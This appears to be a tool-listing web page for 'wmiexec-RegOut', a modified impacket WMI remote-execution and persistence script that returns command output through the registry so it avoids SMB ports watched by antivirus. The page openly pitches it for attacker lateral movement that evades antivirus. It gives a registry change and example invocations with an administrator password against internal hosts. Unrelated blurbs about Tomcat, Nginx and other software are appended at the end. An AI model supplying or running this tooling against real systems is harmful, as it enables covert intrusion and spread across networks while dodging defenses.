wmiexec-RegOut is the modify version of impacket wmiexec.py, wmipersist.py. Got output(data, response) from registry, don’t need SMB connection, but I’m in the bad code.
In original wmiexec.py, it get response from smb connection (port 445,139). Unfortunately, some antivirus software are monitoring these ports as high risk.
In this case, I drop smb connection function and use others method to execute command.
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration
Name: EnableAt
Type: REG_DWORD
Value: 1
(Highly recommend, !!!only works on impacket v0.9.24!!!): A Python version of WMIHACKER, which I picked the vbs template from it. Attacker can use it to do lateral movement safety under antivirus-software running.Generally, you just need to install official impacket.
python3 wmiexec-reg.py administrator:111qqq…@192.168.10.90 ‘whoami’
With cleartext password (without output)
python3 wmipersist-wip.py administrator:111qqq…@192.168.10.20 ‘command’
Apache Tomcat is an open-source Java application server that implements the Java Servlet, JavaServer Pages, and…
Setting the correct timezone on your Ubuntu machine is more important than it sounds. Your…
PrestaShop is a free, open-source e-commerce platform built with PHP and MySQL. It comes with a…
SSH keys give you a more secure and convenient way to connect to remote servers. Instead…
FFmpeg is a free, open-source command-line tool for working with multimedia files. It can convert video…
Nginx server blocks let you run more than one website on a single server. Each block…